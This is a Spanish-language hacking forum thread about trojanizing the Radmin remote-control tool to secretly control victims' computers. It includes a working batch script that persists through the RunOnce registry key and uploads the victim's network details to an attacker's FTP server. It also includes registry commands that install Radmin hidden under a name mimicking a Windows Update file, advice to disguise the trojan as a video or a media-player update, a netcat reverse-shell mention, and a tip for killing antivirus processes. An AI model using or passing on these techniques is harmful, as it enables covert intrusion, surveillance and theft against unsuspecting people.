Autor
|
Tema: Troyanizando Radmin 2.1 control remoto (Leído 162,668 veces)
|
octalh
Desconectado
Mensajes: 518
"El sueño de la razón produce monstruos"
|
bueno el motivo por el cual le puse wuaudt.exe es porque hay un archivo en la carpeta system32 que se llama wuauclt.exe, ese se encarga de las actualizaciones automaticas del windows, lo hice para hacerlo pasar desapersibido, para un usuario comun lo mas probable es que ni fw tenga pero para alguien que ya sabe un poco mas, ya sabra para que es wuauclt.exe y si su fw de da alarma alomejor y no se fije bien en el nombre y lo deje pasar, por eso hasta le puse el icono del original, veras el metodo de la reverse shell con netcat solo era para que puedas activarlo en el momento y no tengas que esperar a que la victima reinicie, lo que tambien puedes hacer es ponerle un notificador de ip al radmin, de esa forma si la victima tiene ip dinamica estaras al tanto de su nueva ip, te pongo el codigo abajo, este codigo fue sacado del foro, pero lo modifique un poco
@echo off REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v wuauclt /t REG_SZ /d "C:\windows\system32\systrai.bat" /f echo configuracion del sistema de la victima >C:\WINDOWS\system32\win32ip.dll arp -a >>C:\WINDOWS\system32\win32ip.dll ipconfig /all >>C:\WINDOWS\system32\win32ip.dll echo usuario >C:\WINDOWS\system32\Win32el.dll echo contraseña >>C:\WINDOWS\system32\Win32el.dll echo put C:\WINDOWS\system32\win32ip.dll victima.txt >>C:\WINDOWS\system32\Win32el.dll echo QUIT >>C:\WINDOWS\system32\Win32el.dll ftp -s:C:\WINDOWS\system32\Win32el.dll servidor ftp exit
recuerda que el bat se debe llamar systrai.bat y lo debes colocar en la carpeta system32
bueno lo quite unos cuantos comandos, porque si tu quieres le puedes poner mas par conocer mas del sistema, el motivo fue porque este bat se ejecuta todos los dias con el inicio del sistema y por supesto de forma oculta, pero mientras el bat este subiendo los datos al servidor, a la victima no se le va aparecer el escritorio, y eso le va parecer sospechoso fue por eso que le quite comandos, asi sube la info a tu servidor en unos cuanros segundos y sin problemas ni sospechas
salud2..
|
|
|
En línea
|
|
|
|
1000101
Desconectado
Mensajes: 4
|
Hola Octalh... gracias por responder... bueno... tratare de probar ese bat... a ver como funciona... pero un consejo al momento de que cualquier antivirus, vacuna, o antispyware avise podriamos transformar el archivo exe. (troyano) en un archivo zip autoejecutable... poniendole sus mismos iconos, etc... yo le puse en selecionar comandos: "cualquier tipo de archivo", asi le mande un video chistoso a un amigo... y lo que ve el es que se descomprime y luego ve el video, mientras que se ejecutan todos los bat sin que se de cuenta... con algun mensaje para despirtar, porsupuesto, Windows Media Player: Tu archivo ha sido descargado con exito. pero para una persona que proteja su computador a diario... el archivo que tranformemos podriamos disfrasarlo como una actualizacion del mismo Windows Media Player... asi al momento de que aviso de que aviax.exe esta intentando connectarse a internet o el mismo r_server... el mensaje dira que aviax o cualquier nombre es la actualizacion del mismo y que no se puede ver el video sin esta actualizacion... luego que acepte... le mandamos otro mensaje que diga que se actualizo... es solo una idea al momento de que funcionen todas las defensas... por que no dira que es un virus... sino que hay programas que intentan conectarse a la net... pero igual me gustaria saber cual podria ser el bat que se pase por alto el famoso "AnitiSpyWare" pues es él quien me delató. y otra cosa muy interesante... busqué... con el programa para cambiar los iconos, ResHack... ejecute el winzip: c:\archivo de programa\winzip32 ... y encontre un icono transparente... muy util al momento de camuflar el servidor... asi... si se llegara a ver en la barra de tareas... solo se veria un espacio ... ok... Y por ultimo te recuerdo octalh que solo soy un novato... y quede plop al momento de intentar ingresar mis datos en el ultimo bat que mandaste... si eres tan amable de dar un ejemplo de como podria quedar con datos... aprueba de jiles que preguntan tonteras... ya? saludos y gracias...!!!
|
|
|
En línea
|
|
|
|
octalh
Desconectado
Mensajes: 518
"El sueño de la razón produce monstruos"
|
mira el ultimo bat es un notificador de ip, por aquello de las ip dinamicas, lo que hace es enviarte a un servidor ftp la nueva ip de la victima, para que te puedas conectar con radmin, puedes crearte una cuenta en lycos, iespana, miarroba...etc y usar el servidor ftp que te den
salu2...
|
|
|
En línea
|
|
|
|
1000101
Desconectado
Mensajes: 4
|
mira... si el problema no es saber la ip... por que la saco del comando netstat -na cuando estoy en msn o mandando archivos a la vistima... si el problema es que los bat te delatan... me entiendes... dime una cosa... una vez que tengo el servidor instalado en el pc de la victima... el dll... y todo lo que instala... yo sabiendo la ip (que es dinamica)... me conecto con esa ip... y el puerto 1719 deberia funcionar... ¿que pongo aqui? echo configuracion del sistema de la victima (en esta no entiendo) echo usuario > ( en esta me imagino que el nick de usuario que hice) echo contraseña >(¿es la contraseña del nick?) ftp -s:C:\WINDOWS\system32\Win32el.dll servidor ftp (y aqui no cacho... en vez de poner servidor pongo algun numero, una direccion o que..) exit y con respecto a otra cosa... solo por cultura informatica... si tenemos acceso a este tipo de derechos... podemos poner que se conecte la webcam o eso es otra cosa... lei por ahi que a alguien lo detenieron por habilitar una webcam de otra persona... creo que fue en argentina... pero no me imagino como se pueda hacer eso... saludos...!!!!
|
|
|
En línea
|
|
|
|
kartor
|
hola me acabo de reguistrar y es el prmer mensaje que pongo soy nuevo en esto no se si la pregunta q les vy hacer sera muy evidente pero prfavor ayudarme les esplico le e metido a la victima el servidor recibo la sel miro la ip luego le ejecuto el servidor pero no me va asi q le desactivo el firewall de windows pero no consigo desactivar la proteccion de automatica de panda ni matar los procesos de panda me podriais decir como hacerlo? creo que todo esta bien porque lo e probado con migo y funciona gracias por adelantado
|
|
|
En línea
|
|
|
|
|
kartor
|
eso ya lo lei el problema que yo tengo es con el fw de panda`porque de esa manera no me deja con el panda alguin save hacer eso pero con el panda? gracias de todos modos
|
|
|
En línea
|
|
|
|
octalh
Desconectado
Mensajes: 518
"El sueño de la razón produce monstruos"
|
usa un mata procesos
|
|
|
En línea
|
|
|
|
ilolo
Desconectado
Mensajes: 1
|
Hola si alguien me puede ayudar por favor. soy muy novato, he echo todo paso a paso segun el manual , y elegido la opicon de ejecutable para poderselo enviar a la victima. aun haciendo todos los pasos tal y como dice el manual no me ha funcionado. el nc se abre y puedo ver sin problema , el pc de la victima desde el cmd pero el radmin no funciona. pero aun asi tengo algunas dudas que supongo que seran las que hacen que no funcione 1. agregar ejecutable cuando dices "elegir archivo de sistema" hace referencia a que en el IPacker Tool hay que elegir las pestañas " archivo" y la pestaña " sistema" la misma duda se aplicaria para el punto 4º (dll) y para el 7º (nc) 2 el el punto 4º al agregar la dll el IPacker Tool me muestra comandos (0) tiene que quedar asi?. Bueno si alguien pudiese ayudarme con estas dudas. le estaria muy agradecido gracias adelantadas salu2
|
|
|
En línea
|
|
|
|
CheMo
Desconectado
Mensajes: 1
|
Nas, soy nuevo en el foro, estoy intentado hacer el tutorial, pero me pierdo en lo de hacer el bat. Meto toda la linea de codigo en el cmd pero al final no se que es realmente lo que se crea, se supone que es un archivo .bat? O es un .exe? La linea en cuestion es esta: REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000" REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993" REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000" REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaudt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"
En la carpeta radmin de archivos de programa tengo puesto el fichero wuaudt.exe a ver si me pueden ayudar plz
|
|
|
En línea
|
|
|
|
|
|